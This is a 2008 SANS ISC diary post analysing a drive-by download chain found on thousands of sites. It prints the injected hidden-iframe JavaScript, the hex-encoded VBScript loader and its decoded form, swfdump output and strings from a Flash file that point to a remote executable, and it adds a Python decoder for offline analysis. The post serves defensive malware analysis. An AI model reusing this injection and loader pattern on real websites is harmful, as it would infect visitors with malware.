SANS ISC: InfoSec Handlers Diary Blog - Another example of malicious SWF


Another example of malicious SWF

Published: 2008-05-28
Last Updated: 2008-05-28 17:16:57 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)

Jerry wrote in to tell us of a new variant on the theme of SWF files
being found in the wild. This one uses encoded VBScript to deliver its
payload. A Google search for www.chliyi.com gives us over 5,000 hits! The
likely method of getting the malicious scripts onto these web servers is
SQL injection, so check your code regularly.

So, let's take a look at this one:

hxxp://www.chliyi.com/reg.js

Which contains:

if (navigator.systemLanguage=='zh-cn')
{
    // Do nothing when the visitor's system language is Simplified Chinese
}
else{
    document.writeln("<iframe src=hxxp://www.chliyi.com/img/info.htm width=0 height=0></iframe>");
}

Downloading hxxp://www.chliyi.com/img/info.htm gives us the following:

<Script Language="VBScript">
Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204..."
Function Hex2Str(ByVal Ans)
    For i = 1 To Len(Ans) Step 2
        If IsNumeric(Mid(Ans, i, 1)) Then
            tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 2))
        Else
            tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 4))
            i = i + 2
        End If
    Next
    Hex2Str = tmpStr
End Function
Document.Write Hex2Str(Song)
</Script>
<script language="javascript" src="hxxp://count47.51yes.com/click.aspx?id=470732873&logo=12"></script>

Hex-decoding the Song string gives the following script:

<Script Language=VBScript>
        On Error Resume Next
        Set Ob = Document.CreateElement("object")
        Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
        Set Pop = Ob.Createobject("Adodb.Stream","")
        If Not Err.Number = 0 then
                Err.clear
                Document.write ("<embed src=\"flash.swf\"></embed>")
                Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>")
                Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>")
        Else
                Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>")
        End If
</Script>
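To decode pages like this offline without running the VBScript, here is an added Python reimplementation of the Hex2Str rules above (this is example code written for this diary, not code from the page), which also pulls the src= targets out of whatever the decoded script writes. The sample page is constructed from the hex prefix shown above; the "gbk" code page used for the four-digit branch is an assumption, since VBScript's Chr() resolves double-byte values through the system code page.

```python
import re

# Hex blob assigned to the Song variable in the captured page.
SONG_RE = re.compile(r'Song\s*=\s*"([0-9A-Fa-f]+)"')
# src= targets of the iframe/embed tags that the decoded script writes.
SRC_RE = re.compile(r'<(?:iframe|embed)\b[^>]*?\bsrc\s*=\s*"?([^\s">]+)',
                    re.IGNORECASE)


def hex2str(ans: str, codepage: str = "gbk") -> str:
    """Decode a hex string with the same rules as the page's Hex2Str.

    The VBScript walks the blob two digits at a time. When the first digit
    is numeric (0-9) it consumes two digits as one byte; otherwise it takes
    four digits as one double-byte character and skips ahead. The code page
    used for that double-byte value is an assumption (see lead-in).
    """
    out = []
    i = 0
    while i < len(ans):
        if ans[i].isdigit():
            out.append(chr(int(ans[i:i + 2], 16)))      # single byte
            i += 2
        else:
            chunk = ans[i:i + 4]
            if len(chunk) < 4:
                raise ValueError(f"truncated wide character at offset {i}")
            out.append(bytes.fromhex(chunk).decode(codepage, errors="replace"))
            i += 4
    return "".join(out)


def decode_page(html: str) -> str:
    """Find the Song blob in a captured info.htm and decode it."""
    m = SONG_RE.search(html)
    if not m:
        raise ValueError("no Song hex blob found")
    return hex2str(m.group(1))


def referenced_files(decoded: str) -> list:
    """List the files the decoded script tries to load (for follow-up analysis)."""
    return SRC_RE.findall(decoded)


# Constructed sample: the hex prefix from the captured page, minus its trailing digit.
SAMPLE_PAGE = ('<Script Language="VBScript">\n'
               'Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E20"\n'
               'Document.Write Hex2Str(Song)\n</Script>\n')

if __name__ == "__main__":
    print(repr(decode_page(SAMPLE_PAGE)))
```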

Let's fetch hxxp://www.chliyi.com/img/flash.swf, which gives us:

file flash.swf
flash.swf: Macromedia Flash data, version 9

swfdump flash.swf
[HEADER]        File version: 9
[HEADER]        File size: 858
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 771
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[006]       336 DEFINEBITS defines id 0682
==== Error: Unknown tag:0x056 ====
[056]        40 (null)
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
==== Error: Unknown tag:0x056 ====
[056]        12 (null)
==== Error: Unknown tag:0x052 ====
[052]       383 (null)
==== Error: Unknown tag:0x04c ====
[04c]        25 (null)
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Which looks familiar to us now.
real.htm, new.htm, help.htm are also quite interesting.

strings flash.swf shows us another possible malware location:
FWS     Z
urlmon.dll
;C:\6123t.exe
hxxp://www.jj120.com/inc/f_ckjp.exe
                                  CC
new_fla
MainTimeline
flash.display   MovieClip
new_fla:MainTimeline
frame1
addFrameScript
Object
flash.events
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Sprite
new_fla.MainTimeline

I munged the name of the file to pass language filters.
When I checked, jj120.com resolved to 219.153.18.216 and didn't
want to give me the file.

Thanks again Bojan and Jeremy!

Cheers,
Adrien de Beaupré
Bell Canada, Professional Services

Keywords: malware swf